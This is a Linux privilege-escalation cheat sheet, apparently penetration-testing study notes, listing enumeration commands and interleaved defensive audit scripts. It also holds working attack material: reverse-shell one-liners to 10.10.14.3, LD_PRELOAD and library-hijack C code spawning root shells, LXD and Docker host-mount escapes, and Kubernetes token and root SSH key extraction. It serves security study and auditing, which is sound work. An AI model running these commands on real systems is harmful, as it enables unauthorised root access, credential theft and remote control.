# Linux Privilege Escalation

## Linux Privilege Escalation

### Enumeration

#### General command

* `whoami`
* `id`
* `hostname`
* `ip a` or `ifconfig`
* `sudo -l`

#### OS Related

* OS Version
  * `cat /etc/os-release`
* Kernel Version
  * `uname -r`
  * `uname -a`
  * `cat /proc/version`

#### Users

* LoggedIn User
  * `w`
  * `who`
  * `lastlog`
* Home Directory Content
  * `ls /home`
  * `ls -la /home/<username>/`
  * `ls -l ~/.ssh`
* Environment
  * `echo $PATH`
  * `env`
* Shell Installed
  * `cat /etc/shells`
* Bash History
  * `history`
* Sudo Privileges
  * `sudo -l`
* Users
  * `cat /etc/passwd`
  * `cat /etc/group`
  * `getent group <group>`

#### Interesting Files

* Configuration Files
  * `.conf` `.config` `.xml` `.bak`
  * `find / -type f \( -name "*.conf" -o -name "*.config" \) -exec ls -l {} \; 2>/dev/null`
  * `find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null`
* Script Files
  * `find / -type f -name "*.sh" 2>/dev/null | grep -v "src\|snap\|share"`
* Readable Shadow File
  * `/etc/shadow`
* Hidden Files & Directories
  * `find / -type f -name ".*" -exec ls -l {} \; 2>/dev/null`
  * `find / -type d -name ".*" -ls 2>/dev/null`
  * `ls -l /tmp /var/tmp /dev/shm`
* Finding History Files
  * `find / -type f \( -name "*_hist" -o -name "*_history" \) -exec ls -l {} \; 2>/dev/null`
* Find Writable
  * Directories `find / -path /proc -prune -o -type d -perm -o+w 2>/dev/null`
  * Files `find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null`
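The two `find` one-liners above list everything that is world-writable; the check a defender usually wants is narrower, because a world-writable directory that carries the sticky bit (`/tmp`-style `1777`) does not let users replace each other's files, while one without it does. The following script is an added example, not part of the original notes: it wraps the same `find` expressions in functions, excludes sticky directories, and builds a constructed sample tree so the checks can be run offline. All function and variable names are this example's own.

```shell
#!/bin/sh
# Added example (not from the original notes): audit world-writable paths below a
# directory. A world-writable directory WITHOUT the sticky bit is the risky case,
# since any user can replace or rename files in it; /tmp-style 1777 directories are
# left out. Function and variable names here are this example's own.

# World-writable regular files below $1 (-perm -0002 is the numeric form of -o+w).
ww_files() {
    find "$1" -path /proc -prune -o -type f -perm -0002 -print 2>/dev/null | sort
}

# World-writable directories below $1 that lack the sticky bit (-perm -1000).
ww_dirs_nosticky() {
    find "$1" -path /proc -prune -o -type d -perm -0002 ! -perm -1000 -print 2>/dev/null | sort
}

# Constructed sample tree so the checks can be exercised offline; prints its path.
make_sample_tree() {
    d=$(mktemp -d)
    mkdir "$d/dropbox" "$d/shared"
    chmod 777 "$d/dropbox"                                          # reported: no sticky bit
    chmod 1777 "$d/shared"                                          # not reported: sticky bit set
    printf 'echo hi\n' > "$d/script.sh"; chmod 666 "$d/script.sh"   # reported
    printf 'data\n' > "$d/ok.txt";       chmod 644 "$d/ok.txt"      # not reported
    printf '%s\n' "$d"
}

# Stand-alone run: "sh ww_audit.sh demo" builds the tree and prints the findings.
if [ "${1:-}" = "demo" ]; then
    root=$(make_sample_tree)
    echo "world-writable files:";                   ww_files "$root"
    echo "world-writable dirs without sticky bit:"; ww_dirs_nosticky "$root"
    rm -rf "$root"
fi
```

Run it against `/` (as in the notes) by calling `ww_files /` and `ww_dirs_nosticky /`; the `-path /proc -prune` keeps it out of `/proc`, and the `2>/dev/null` hides the permission errors an unprivileged user gets elsewhere.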

#### Services & Internal Enumeration

* Cron Jobs
  * `ls -la /etc/cron.daily/`
* File System and Additional Drives
  * `lsblk` -> drive
  * `lpstat` -> printer
  * `cat /etc/fstab` -> drive/file system
  * `df -h` -> mounted file system
  * `cat /etc/fstab | grep -v "#" | column -t` -> unmounted file system
* Network
  * `ip a`
  * `route` - `netstat -r`
  * `arp -a`
  * `cat /etc/resolv.conf`
  * `cat /etc/hosts`
* Binaries
  * `ls -l /bin /usr/bin/ /usr/sbin/`
* Hardware
  * `lscpu`
* Running Services
  * `find /proc -name cmdline -exec cat {} \; 2>/dev/null | tr " " "\n"`
* List Current Process
  * `ps aux | grep <user>` (e.g. `root`)
  * `ps au`
* Sudo Version
  * `sudo -V`
* Installed Packages and Version
  * `apt list --installed | tr "/" " " | cut -d" " -f1,3 | sed 's/[0-9]://g' | tee -a installed_pkgs.list`

### Misconfiguration

#### Path Abuse

* Check the `PATH` environment variable (`echo $PATH`) for writable or relative entries
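What makes a `PATH` entry abusable is that a lower-privileged user can write into it, or that it is empty or relative and therefore resolves to whatever the current directory happens to be. The script below is an added example, not part of the original notes: it walks a colon-separated `PATH` value and reports those three cases, using a constructed `PATH` in its demo. Function names are this example's own.

```shell
#!/bin/sh
# Added example (not from the original notes): audit a PATH value for entries that
# let another user plant a binary a privileged script would pick up: empty entries
# and relative entries (both resolve against the current directory) and absolute
# directories writable by others. Function names here are this example's own.

# Print 'w' if $1 is writable by "others" (the o+w bit), '-' otherwise.
other_write_bit() { ls -ld "$1" | cut -c9; }

# Usage: audit_path "<colon-separated PATH>"; prints one finding per line.
audit_path() {
    rest="$1:"                       # trailing ':' lets the loop consume the last field
    while [ -n "$rest" ]; do
        entry=${rest%%:*}
        rest=${rest#*:}
        case "$entry" in
            "")  echo "EMPTY entry: resolves to the current directory" ;;
            /*)  if [ -d "$entry" ] && [ "$(other_write_bit "$entry")" = "w" ]; then
                     echo "WORLD-WRITABLE entry: $entry"
                 fi ;;
            *)   echo "RELATIVE entry: $entry" ;;
        esac
    done
    return 0
}

# Stand-alone run: "sh path_audit.sh demo" checks the caller's own PATH, then a
# constructed PATH with an empty field, a '.' and a world-writable directory.
if [ "${1:-}" = "demo" ]; then
    echo "current PATH:";     audit_path "$PATH"
    tmp=$(mktemp -d); mkdir "$tmp/open"; chmod 777 "$tmp/open"
    echo "constructed PATH:"; audit_path "/usr/bin::$tmp/open:."
    rm -rf "$tmp"
fi
```

When reviewing a cron job or sudo-invoked script, feed it the `PATH` that script actually runs with (for cron, the one set in the crontab or the daemon's default), not the interactive shell's.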

#### Wildcard Abuse

* Check for scripts or cron jobs that pass unquoted wildcards (`*`, `?`, `[]`, `~`, `-`) to commands

#### `SETUID` and `SETGID` permissions

* `find "$DIRECTORY" -perm /4000`
* `find "$DIRECTORY" -perm /2000`
* `find "$DIRECTORY" -perm /u=s,g=s`
* `find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null`
* `find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null`
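On the defensive side the useful question is not "which set-id binaries exist" but "which set-id binaries exist that did not exist last time". The script below is an added example, not part of the original notes: it wraps the `find -perm` expressions above in a function and diffs the result against a saved baseline, so a newly appeared setuid or setgid file stands out. Names are this example's own.

```shell
#!/bin/sh
# Added example (not from the original notes): inventory setuid/setgid files below a
# directory and compare the result with a saved baseline, so that a set-id binary
# that appeared since the baseline was taken stands out. Names are this example's own.

# Setuid (-perm -4000) or setgid (-perm -2000) regular files below $1, sorted.
list_setid() {
    find "$1" -path /proc -prune -o -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null | sort
}

# Usage: new_setid_since <dir> <baseline-file>
# Prints set-id files below <dir> that are not listed (one path per line) in the
# baseline file. An empty baseline file reports everything, as it should.
new_setid_since() {
    list_setid "$1" | grep -vxF -f "$2"
    return 0
}

# Stand-alone run: "sh setid_audit.sh demo" builds a constructed tree, saves a
# baseline with one entry, then adds a second set-id file and shows it as new.
if [ "${1:-}" = "demo" ]; then
    root=$(mktemp -d)
    printf '#!/bin/sh\n' > "$root/known";   chmod 4755 "$root/known"
    list_setid "$root" > "$root/baseline.txt"
    printf '#!/bin/sh\n' > "$root/dropped"; chmod 2755 "$root/dropped"
    echo "set-id files not in baseline:"; new_setid_since "$root" "$root/baseline.txt"
    rm -rf "$root"
fi
```

Take the baseline with `list_setid / > setid-baseline.txt` on a known-good build and re-run `new_setid_since / setid-baseline.txt` from cron or a config-management check; anything it prints deserves a look against the package manager's file ownership.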

#### Sudo Right Abuse

* `sudo -l`

#### Weak NFS

* `showmount -e 10.129.2.12`
* `cat /etc/exports`
* Copy shell to /mnt and add SETUID
  * `cp shell /mnt`
  * `chmod u+s /mnt/shell`
  * `sudo mount -t nfs 10.129.2.12:/tmp /mnt`

#### Hijacking Tmux Session

* Check for a `tmux` process running as a privileged user (`dev` group only)
  * `ps aux | grep tmux`
  * `ls -la /shareds`
  * `tmux -S /shareds`

### Capabilities

* `CAP_SETUID`
* `CAP_SETGID`
* `CAP_SYS_ADMIN`
* Enumerate
  * `find /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin -type f -exec getcap {} \;`
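The `getcap` sweep above prints every file capability; the ones that matter are those that amount to root (`CAP_SETUID`, `CAP_SETGID`, `CAP_SYS_ADMIN` and a few others). The script below is an added example, not part of the original notes: it reads `getcap` output in both the older `path = caps+ep` and the newer `path caps=ep` format and prints only the dangerous grants. The sample output it ships with is constructed; function and variable names are this example's own.

```shell
#!/bin/sh
# Added example (not from the original notes): read getcap output and flag the file
# capabilities that amount to root when held by a binary an unprivileged user can
# run. Both getcap output styles are handled: the older "path = caps+ep" and the
# newer "path caps=ep". The sample below is constructed; names are this example's own.

SAMPLE_GETCAP='/usr/bin/ping cap_net_raw=ep
/usr/bin/python3.8 = cap_setuid+ep
/usr/sbin/mtr-packet cap_net_raw=ep
/usr/local/bin/perl cap_sys_admin,cap_dac_override=ep'

# Reads getcap lines on stdin; prints "path: capability" for each dangerous one.
flag_dangerous_caps() {
    awk '
    BEGIN {
        n = split("cap_setuid cap_setgid cap_sys_admin cap_dac_override cap_dac_read_search cap_sys_ptrace cap_sys_module cap_chown cap_fowner", d)
        for (i = 1; i <= n; i++) danger[d[i]] = 1
    }
    NF == 0 { next }
    {
        path = $1
        caps = ($2 == "=") ? $3 : $2   # old style has a bare "=" as the 2nd field
        sub(/[=+].*$/, "", caps)       # strip the "=ep" / "+ep" flag suffix
        m = split(caps, list, ",")
        for (i = 1; i <= m; i++)
            if (list[i] in danger) print path ": " list[i]
    }'
}

# Live check over the same directories the notes enumerate (needs getcap installed).
audit_caps_live() {
    find /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin -type f -exec getcap {} \; 2>/dev/null |
        flag_dangerous_caps
}

# Stand-alone run: "sh caps_audit.sh demo" flags the constructed sample.
if [ "${1:-}" = "demo" ]; then
    printf '%s\n' "$SAMPLE_GETCAP" | flag_dangerous_caps
fi
```

`cap_net_raw` on `ping` is the normal, packaged case and is not flagged; an interpreter such as `python3` or `perl` carrying `cap_setuid` or `cap_sys_admin` is the finding to escalate, since the interpreter will hand that capability to any script a user runs with it.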

### Privileged Groups

* `LXC/LXD`
  * Starting a privileged container with `security.privileged=true`
  * `lxd init`
  * `lxc image import alpine.tar.gz alpine.tar.gz.root --alias alpine`
  * `lxc init alpine r00t -c security.privileged=true`
  * `lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true`
  * `lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true`
  * `lxc start r00t`
    * `lxc exec r00t /bin/sh`
* `Docker`
  * see Docker Abuse
* `Disk`
* `ADM`

### Service and process Abuse

#### Cron Job Abuse

* `/etc/cron.d`
* `ls -la /etc/cron.daily/`
* Find writable files
  * `find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null`
* Enumerate running processes
  * `./pspy64 -pf -i 1000`

#### Docker Abuse

* `Docker`
  * Same as Linux
  * Interesting: `docker.sock` - `/var/run/docker.sock`
    * `/tmp/docker -H unix:///app/docker.sock ps`
    * `/tmp/docker -H unix:///app/docker.sock run --rm -d --privileged -v /:/hostsystem main_app`
    * `/tmp/docker -H unix:///app/docker.sock ps`
    * `/tmp/docker -H unix:///app/docker.sock exec -it 7ae3bcc818af /bin/bash`
    * `docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it ubuntu chroot /mnt bash`

#### Kubernetes

* **Each pod functions as a separate virtual machine on a node, complete with its own IP, hostname, and other details**.
* Control Plane -> master node
  * TCP etcd `2379`, `2380`
  * API Server `6443`
  * Scheduler `10251`
  * Controller manager `10252`
  * Kubelet API `10250`
  * Read-Only Kubelet API `10255`
* Minion -> Worker Node
* API Server Interaction
  * `curl https://10.129.10.11:6443 -k`
  * Extracting pods via the kubelet API
    * `curl https://10.129.10.11:10250/pods -k | jq .`
  * Extracting pods via kubeletctl
    * `kubeletctl -i --server 10.129.10.11 pods`
  * Available Commands
    * `kubeletctl -i --server 10.129.10.11 scan rce`
  * Execute Command
    * `kubeletctl -i --server 10.129.10.11 exec "id" -p nginx -c nginx`
  * Extracting Token
    * `kubeletctl -i --server 10.129.10.11 exec "cat /var/run/secrets/kubernetes.io/serviceaccount/token" -p nginx -c nginx | tee -a k8.token`
  * Extracting Certificates
    * `kubeletctl --server 10.129.10.11 exec "cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt" -p nginx -c nginx | tee -a ca.crt`
  * List Privileges
    * `export token=$(cat k8.token)`
    * `kubectl --token=$token --certificate-authority=ca.crt --server=https://10.129.10.11:6443 auth can-i --list`
  * Creating new pod
    * `kubectl --token=$token --certificate-authority=ca.crt --server=https://10.129.96.98:6443 apply -f privesc.yaml`
    * `kubectl --token=$token --certificate-authority=ca.crt --server=https://10.129.96.98:6443 get pods`
  * Extracting root ssh key
    * `kubeletctl --server 10.129.10.11 exec "cat /root/root/.ssh/id_rsa" -p privesc -c privesc`

#### LogRotate

* `logrotate`
* `cat /etc/logrotate.conf`
* `sudo cat /var/lib/logrotate.status`
* `ls /etc/logrotate.d/`
* `cat /etc/logrotate.d/dpkg`
* Exploitation requires
  * write permission on the log files
  * `logrotate` running as root
  * a vulnerable version, e.g. 3.8.6, 3.11.0, 3.15.0, 3.18.0
* Tools - <https://github.com/whotwagner/logrotten>

### Shared Library

#### General Information

* Static libraries `.a`
  * Compiled and part of the program
* Dynamically linked shared object libraries `.so`
  * Loaded at run time, so they can be replaced or altered
* Specify location of dynamic libraries
  * when compiling `-rpath` or `-rpath-link`
  * using env `LD_RUN_PATH` or `LD_LIBRARY_PATH`
  * placing in `/lib` or `/usr/lib`
  * Changing `/etc/ld.so.conf`
  * `LD_PRELOAD` - load library before executing binary
* `ldd binary`

#### Exploiting `LD_PRELOAD`

* Compile a `so object`

```c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>   /* setuid, setgid */

/* Runs when the library is loaded via LD_PRELOAD (built with -nostartfiles). */
void _init() {
	unsetenv("LD_PRELOAD");
	setgid(0);
	setuid(0);
	system("/bin/bash");
}
```

* `gcc -fPIC -shared -o root.so root.c -nostartfiles`
* `sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 restart`

#### Shared Object Hijacking

* Search for non-standard libraries
  * use `ldd <binary>`
* Find the `RUNPATH` configuration (loads shared libraries from a custom location)
  * `readelf -d payroll | grep PATH`
* Before creating a new library, find the function name the binary calls
  * Run the program and note the undefined symbol it reports
  * Create the malicious shared object

    ```c
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>

    /* Same name as the undefined symbol the binary expects. */
    void dbquery() {
        printf("Malicious library loaded\n");
        setuid(0);
        system("/bin/sh -p");
    }
    ```
* `gcc src.c -fPIC -shared -o /development/libshared.so`

#### Python Library Hijacking

* Wrong write permissions
  * Modify the library module at the location the script imports it from, e.g. for a script such as

    ```python
    #!/usr/bin/env python3
    import psutil
    available_memory = psutil.virtual_memory()
    ```

    * find the function to modify: `grep -r "def virtual_memory"`
* Library Path
  * `python3 -c 'import sys; print("\n".join(sys.path))'`
  * identify which module the target script imports
  * check write permission on that module or on a higher-level directory: `ls -al <path>`
* `PYTHONPATH` environment variable
  * `PYTHONPATH` is an environment variable that indicates what directory (or directories) Python can search for modules to import.
  * `sudo PYTHONPATH=/newPATHWithLib /usr/bin/python3 ./mem_status.py`
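All three sub-cases above (a writable module, a writable `sys.path` directory, and a `PYTHONPATH` that is honoured by a root-run script) come down to one audit question: where will `python3` load this module from, and who can write there? The script below is an added example, not part of the original notes: it resolves a module with `importlib.util.find_spec`, which locates the file without importing (and so without executing) it, and reports module files or `sys.path` directories that other users can write to. It requires `python3`; function names are this example's own.

```shell
#!/bin/sh
# Added example (not from the original notes): for a script that runs as root,
# resolve where python3 would load a given module from (without importing and thus
# executing it) and report module files or sys.path directories that other users can
# write to. Requires python3; function names here are this example's own.

# Print 'w' if $1 is writable by "others" (the o+w bit), '-' otherwise.
other_write_bit() { ls -ld "$1" | cut -c9; }

# Directories on python3's default sys.path that others can write to.
audit_sys_path() {
    python3 -c 'import sys; print("\n".join(p for p in sys.path if p))' 2>/dev/null |
    while IFS= read -r p; do
        if [ -d "$p" ] && [ "$(other_write_bit "$p")" = "w" ]; then
            echo "WRITABLE dir on sys.path: $p"
        fi
    done
    return 0
}

# Usage: audit_module <script-dir> <module-name>
# Resolves the module as python3 would when the script is run from <script-dir>
# (the script's directory comes first on sys.path) and checks the file's mode.
audit_module() {
    f=$(cd "$1" && python3 -c '
import importlib.util, sys
s = importlib.util.find_spec(sys.argv[1])
print(s.origin if s is not None and s.origin else "")' "$2" 2>/dev/null)
    case "$f" in "") ;; /*) ;; *) f="$1/$f" ;; esac   # make a relative origin absolute
    if [ -z "$f" ] || [ ! -f "$f" ]; then
        echo "builtin or unresolved: $2"
    elif [ "$(other_write_bit "$f")" = "w" ]; then
        echo "WRITABLE module: $f"
    else
        echo "ok: $f"
    fi
    return 0
}

# Stand-alone run: "sh pymod_audit.sh demo" checks a constructed world-writable module.
if [ "${1:-}" = "demo" ]; then
    d=$(mktemp -d)
    printf 'X = 1\n' > "$d/mymod.py"; chmod 666 "$d/mymod.py"
    audit_sys_path
    audit_module "$d" mymod
    rm -rf "$d"
fi
```

To audit the `mem_status.py` case from the notes you would run `audit_module /path/to/script psutil`; if a sudo rule lets a user set `PYTHONPATH` for that script, run the check with that variable exported, since `find_spec` honours it exactly as the root-run interpreter would.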

### Various

#### Passive Traffic Capture

* net-creds - <https://github.com/DanMcInerney/net-creds>
* PCredz - <https://github.com/lgandx/PCredz>

### 0-day & Kernel Exploit

* Sudo
* Polkit
* DirtyPipe / DirtyCow
* Netfilter

### Rev Shell

* `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 443 >/tmp/f`
* `bash -i >& /dev/tcp/10.10.14.3/443 0>&1`

### Tools

* LinEnum - [LinEnum](https://github.com/rebootuser/LinEnum)
* [LinPeas](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS)
* strace - for capturing credentials from traced processes
* [pspy](https://github.com/DominicBreuker/pspy)
* [logrotten](https://github.com/whotwagner/logrotten)
* [net-creds](https://github.com/DanMcInerney/net-creds)
* [PCredz](https://github.com/lgandx/PCredz)
* `readelf`
* `ldd`

### Resources

* [Escaping Restricted Shell](https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#escaping-from-restricted-shells)
* [SETUID and SETGID](https://linuxconfig.org/how-to-use-special-permissions-the-setuid-setgid-and-sticky-bits)
* [GTFObins](https://gtfobins.github.io/)

